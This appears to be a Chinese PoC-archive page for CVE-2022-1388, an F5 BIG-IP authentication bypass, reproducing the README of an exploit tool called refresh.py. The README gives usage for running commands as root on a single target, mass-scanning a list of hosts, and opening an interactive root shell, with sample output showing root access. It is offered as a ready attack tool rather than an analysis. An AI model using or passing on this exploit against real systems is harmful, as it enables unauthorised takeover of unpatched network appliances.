关联漏洞
标题:
F5 BIG-IP 访问控制错误漏洞
(CVE-2022-1388)
描述:F5 BIG-IP是美国F5公司的一款集成了网络流量管理、应用程序安全管理、负载均衡等功能的应用交付平台。 F5 BIG-IP 存在访问控制错误漏洞,攻击者可以通过未公开的请求利用该漏洞绕过BIG-IP中的iControl REST身份验证来控制受影响的系统。
描述
PoC for exploiting CVE-2022-1388 on BIG IP F5
介绍
# CVE-2022-1388 - refresh
PoC for exploiting CVE-2022-1388 on BigIP F5
### Exploit Usage
```
python3 refresh.py -h
usage: refresh.py [-h] [-u URL] [-f F] [-c CMD] [-s SH]
optional arguments:
-h, --help show this help message and exit
-u URL, --url URL target url
-f F, --file F url file
-c CMD, --command CMD
command
-s SH, --shell SH url to connect
```
#### Exploit single target:
```
$ python3 refresh.py -u IP -c id
::::::::: ::::::::::::::::::::::::::::: :::::::::::::::::: ::: :::
:+: :+::+: :+: :+: :+::+: :+: :+::+: :+:
+:+ +:++:+ +:+ +:+ +:++:+ +:+ +:+ +:+
+#++:++#: +#++:++# :#::+::# +#++:++#: +#++:++# +#++:++#+++#++:++#++
+#+ +#++#+ +#+ +#+ +#++#+ +#++#+ +#+
#+# #+##+# #+# #+# #+##+# #+# #+##+# #+#
### ################ ### ##################### ### ###
</coded by Luchoane>
[++++++] VULNERABLE: xxx.xxx.xxx.xxx | uid=0(root) gid=0(root) groups=0(root) context=system_u:system_r:initrc_t:s0
```
#### Exploit url list
```
$ python3 refresh.py -f list.txt -c id
::::::::: ::::::::::::::::::::::::::::: :::::::::::::::::: ::: :::
:+: :+::+: :+: :+: :+::+: :+: :+::+: :+:
+:+ +:++:+ +:+ +:+ +:++:+ +:+ +:+ +:+
+#++:++#: +#++:++# :#::+::# +#++:++#: +#++:++# +#++:++#+++#++:++#++
+#+ +#++#+ +#+ +#+ +#++#+ +#++#+ +#+
#+# #+##+# #+# #+# #+##+# #+# #+##+# #+#
### ################ ### ##################### ### ###
</coded by Luchoane>
[-] NOT VULNERABLE: xxx.xxx.xxx.xxx
[-] NOT VULNERABLE: xxx.xxx.xxx.xxx
[++++++] VULNERABLE: xxx.xxx.xxx.xxx | uid=0(root) gid=0(root) context=system_u:system_r:init_t
[-] NOT VULNERABLE: xxx.xxx.xxx.xxx
--------------------------
Vulnerable targets scanned:
[+] xxx.xxx.xxx.xxx
```
#### Interactive shell
```
$ python3 refresh.py -s xxx.xxx.xxx.xxx
::::::::: ::::::::::::::::::::::::::::: :::::::::::::::::: ::: :::
:+: :+::+: :+: :+: :+::+: :+: :+::+: :+:
+:+ +:++:+ +:+ +:+ +:++:+ +:+ +:+ +:+
+#++:++#: +#++:++# :#::+::# +#++:++#: +#++:++# +#++:++#+++#++:++#++
+#+ +#++#+ +#+ +#+ +#++#+ +#++#+ +#+
#+# #+##+# #+# #+# #+##+# #+# #+##+# #+#
### ################ ### ##################### ### ###
</coded by Luchoane>
Welcome to the interactive shell for: xxx.xxx.xxx.xxx
User: root
> ping -c 1 127.0.0.1
PING 127.0.0.1 (127.0.0.1) 56(84) bytes of data.
64 bytes from 127.0.0.1: icmp_seq=1 ttl=64 time=0.027 ms
--- 127.0.0.1 ping statistics ---
1 packets transmitted, 1 received, 0% packet loss, time 0ms
rtt min/avg/max/mdev = 0.027/0.027/0.027/0.000 ms
>
```
文件快照
[4.0K] /data/pocs/4604009769fd5e61c92c6a803ea89d692b246101
├── [3.0K] README.md
└── [5.7K] refresh.py
0 directories, 2 files
备注
1. 建议优先通过来源进行访问。
2. 如果因为来源失效或无法访问,请发送邮箱到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
3. 神龙已为您对POC代码进行快照,为了长期维护,请考虑为本地POC付费,感谢您的支持。